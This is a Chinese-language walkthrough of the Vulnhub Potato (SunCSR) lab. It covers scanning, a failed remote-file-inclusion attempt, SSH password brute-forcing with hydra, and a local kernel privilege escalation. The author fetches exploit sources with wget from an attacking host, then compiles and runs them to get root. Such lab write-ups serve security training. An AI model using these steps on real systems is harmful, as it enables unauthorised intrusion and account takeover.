首页 > 其他分享 >Vulnhub之Potato suncsr靶机详细测试过程

Vulnhub之Potato suncsr靶机详细测试过程

时间:2022-11-28 16:36:43浏览次数:42  
标签:http potato kali Potato 192.168 56.234 Vulnhub suncsr

Potato suncsr

作者: jason_huawen

目标主机基本信息

名称:Potato (SunCSR): 1

地址:

https://www.vulnhub.com/entry/potato-suncsr-1,556/

提示:

Hint: "If you ever get stuck, try again with the name of the lab"

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.64.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:be:bb:0d      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.234  08:00:27:be:bc:8f      1      60  PCS Systemtechnik GmbH                                                    


利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.234

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.234 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-28 02:22 EST
Nmap scan report for bogon (192.168.56.234)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Potato
|_http-server-header: Apache/2.4.7 (Ubuntu)
7120/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 b1:a8:49:bc:75:01:97:10:da:6a:fa:79:2f:12:41:30 (DSA)
|   2048 0d:6c:93:2a:1b:6c:10:bb:d4:01:4d:9c:42:34:36:df (RSA)
|   256 fc:96:d8:e5:a7:aa:d2:46:9b:00:bd:f2:be:45:cf:b5 (ECDSA)
|_  256 e3:b0:57:45:d3:83:44:45:af:3a:99:94:f8:25:a4:6c (ED25519)
MAC Address: 08:00:27:BE:BC:8F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.60 seconds

NMAP扫描结果表明目标主机有2个开放端口:80(HTTP)、7120(SSH)

Get Access

访问80端口,访问土豆图片,将其下载到Kali Linux本地:

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ ls
nmap_full_scan  potato.jpg
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ steghide extract -sf potato.jpg                            
Enter passphrase: 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ stegseek potato.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.68% (133.0 MB)           
[!] error: Could not find a valid passphrase.
                                                  

没有提取相应的信息。

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ curl http://192.168.56.234/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.7 (Ubuntu) Server at 192.168.56.234 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ nikto -h http://192.168.56.234
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.234
+ Target Hostname:    192.168.56.234
+ Target Port:        80
+ Start Time:         2022-11-28 02:25:33 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 28e, size: 5aec9609b29d1, mtime: gzip
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2022-11-28 02:26:21 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nikto提示有RFI漏洞,但是却没有成功:

──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ vim test.txt  
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
^C
Keyboard interrupt received, exiting.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

─(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ curl http://192.168.56.234/info.php?file=http://192.168.56.206/test.txt

扫描一下有什么目录:

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ gobuster dir -u http://192.168.56.234/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.234/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/28 02:26:55 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 294]
Progress: 214857 / 220561 (97.41%)===============================================================
2022/11/28 02:27:10 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ gobuster dir -u http://192.168.56.234/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.html,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.234/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,php,sh
[+] Timeout:                 10s
===============================================================
2022/11/28 02:27:24 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 286]
/.php                 (Status: 403) [Size: 285]
/index.html           (Status: 200) [Size: 654]
/info.php             (Status: 200) [Size: 87429]
/.php                 (Status: 403) [Size: 285]
/.html                (Status: 403) [Size: 286]
/server-status        (Status: 403) [Size: 294]
Progress: 1096346 / 1102805 (99.41%)===============================================================
2022/11/28 02:28:50 Finished
===============================================================

看来80端口方向暂时搁置。

由于图片为potato,猜测用户名为potato(哈哈),其实作者有提示:Hint: "If you ever get stuck, try again with the name of the lab"

用户hydra破解一下密码:

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.234 -s 7120
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-28 02:39:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.234:7120/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[STATUS] 129.33 tries/min, 388 tries in 00:03h, 14344012 to do in 1848:28h, 15 active
[7120][ssh] host: 192.168.56.234   login: potato   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-28 02:43:59
                                                                                         
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ ssh [email protected] -p 7120
The authenticity of host '[192.168.56.234]:7120 ([192.168.56.234]:7120)' can't be established.
ED25519 key fingerprint is SHA256:jhXxGF91LI55ANwXCLFFF/zViDY10PbLjrKkgU7Q+8Q.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.234]:7120' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
Last login: Tue Sep  8 02:04:57 2020 from 192.168.17.172
potato@ubuntu:~$ id
uid=1000(potato) gid=1000(potato) groups=1000(potato),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)
potato@ubuntu:~$ sudo -l
The program 'sudo' can be found in the following packages:
 * sudo
 * sudo-ldap
Try: sudo apt-get install <selected package>

提权

potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/39230.c
--2022-11-28 07:51:42--  http://192.168.56.206:8000/39230.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8487 (8.3K) [text/x-csrc]
Saving to: ‘39230.c’

100%[====================================================================================>] 8,487       --.-K/s   in 0s      

2022-11-28 07:51:42 (406 MB/s) - ‘39230.c’ saved [8487/8487]

potato@ubuntu:/tmp$ gcc -o exploit 39230.c 
potato@ubuntu:/tmp$ ls
39230.c  exploit  linpeas.sh
potato@ubuntu:/tmp$ chmod +x exploit 
potato@ubuntu:/tmp$ ./exploit 
Failed to open setgroups
euid: 65534, egid: 65534
potato@ubuntu:/tmp$ ./exploit 
Failed to open setgroups
euid: 65534, egid: 65534
potato@ubuntu:/tmp$ 

换一个本地提权漏洞:

potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/39277.c
--2022-11-28 07:55:15--  http://192.168.56.206:8000/39277.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4500 (4.4K) [text/x-csrc]
Saving to: ‘39277.c’

100%[====================================================================================>] 4,500       --.-K/s   in 0s      

2022-11-28 07:55:15 (824 MB/s) - ‘39277.c’ saved [4500/4500]

potato@ubuntu:/tmp$ gcc  -o exploit2 39277.c -lkeyutils -Wall
39277.c:17:22: fatal error: keyutils.h: No such file or directory
 #include <keyutils.h>
                      ^
compilation terminated.
potato@ubuntu:/tmp$ 

Linpeas.sh脚本执行输出结果所给出的本地提权漏洞都失败。

查看目标主机的系统版本,然后用searchsploit查询:

potato@ubuntu:/tmp$ uname -a
Linux ubuntu 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ searchsploit ubuntu 3.13.0  
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege E | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege E | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Privilege Esc | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)             | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                        | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation               | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                      | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Esca | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KAS | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privi | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation      | linux/local/41760.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/potato-suncsr]
└─$ searchsploit -m linux/local/37292.c 
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines (466)

Copied to: /home/kali/Vulnhub/potato-suncsr/37292.c


将37292.c脚本上传至目标主机:

potato@ubuntu:/tmp$ wget http://192.168.56.206:8000/37292.c
--2022-11-28 08:09:07--  http://192.168.56.206:8000/37292.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’

100%[====================================================================================>] 4,968       --.-K/s   in 0s      

2022-11-28 08:09:07 (748 MB/s) - ‘37292.c’ saved [4968/4968]

potato@ubuntu:/tmp$ ls
31346.c  37292.c  39230.c  39277.c  exploit  exploit3  linpeas.sh  x
potato@ubuntu:/tmp$ gcc -o exploit4 37292.c 
potato@ubuntu:/tmp$ chmod +x exploit4 
potato@ubuntu:/tmp$ ./exploit4
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# cd /root
# ls -alh
total 24K
drwx------  2 root root 4.0K Sep  8  2020 .
drwxr-xr-x 22 root root 4.0K Sep  7  2020 ..
-rw-------  1 root root  108 Sep  8  2020 .bash_history
-rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-r--r--  1 root root   52 Sep  8  2020 proof.txt
# cat proof.txt    
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b
# 

成功提权,拿到root flag.

经验教训

  1. CTF类需要仔细阅读作者给出的提示,比如作者就提到当没有思路的时候,需要考虑一下这个靶机的名称。

  2. 不能完全相信一种工具,比如linpeas.sh给出的提权漏洞都无法正确执行,但是用searchsploit给出的代码可以正确执行。

标签:http,potato,kali,Potato,192.168,56.234,Vulnhub,suncsr
From: https://www.cnblogs.com/jason-huawen/p/16932529.html

相关文章

  • Vulnhub之Phineas靶机详细测试过程
    Phineas识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Phineas]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.60.0/16|ScreenView:Unique......
  • Vulnhub之Odin 1靶机详细测试过程
    Odin1作者:jason_huawen目标主机基本信息名称:Odin:1地址:https://www.vulnhub.com/entry/odin-1,619/提示:add/etc/hosts->ipvm+odinexample:192.168.1.1o......
  • Vulnhub之Nully Cybersecurity靶机详细测试过程
    NullyCybersecurity靶机基本信息名称:NullyCybersecurity:1地址:提示:Whileworkingwiththemachine,youwillneedtobruteforce,pivoting(usingmetasploi......
  • vulnhub靶场之THOTH TECH: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:THOTHTECH:1,下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova,下载后直接vbox打开即可。知识点:find提权、hydra......
  • Vulnhub之MoneyBox 1靶机详细测试过程
    MoneyBox作者:jason_huawen靶机基本信息名称:MoneyBox:1地址:https://www.vulnhub.com/entry/moneybox-1,653/识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Mo......
  • vulnhub靶场隐写相关内容
    图片隐写steghideinfotrytofind.jpg#检测图片steghideextract-sftrytofind.jpg#提取图片隐写信息音频隐写工具下载地址:https://github.com/hacksudo/Soun......
  • vulnhub靶场压缩文件解密
    fcrackzip爆破fcrackzip-D-p/usr/share/wordlists/rockyou.txt-usecr3tSteg.zipjohn爆破zip2johnsecr3tSteg.zip|teehash#转换为可识别的hashjohnhashdi......
  • Vulnhub之The Planets Mercury靶机详细测试过程
    ThePlanets:Mercury作者:jason_huawen靶机基本信息名称:ThePlanets:Mercury地址:https://www.vulnhub.com/entry/the-planets-mercury,544/识别目标主机IP地址─......
  • vulnhub靶场之EVILBOX: ONE
    准备:攻击机:虚拟机kali、本机win10。靶机:EVILBOX:ONE,下载地址:https://download.vulnhub.com/evilbox/EvilBox---One.ova,下载后直接vbox打开即可。知识点:文件包含漏洞、f......
  • Vulnhub之M87靶机详细测试过程
    M87识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/M87]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.59.0/16|ScreenView:UniqueHosts......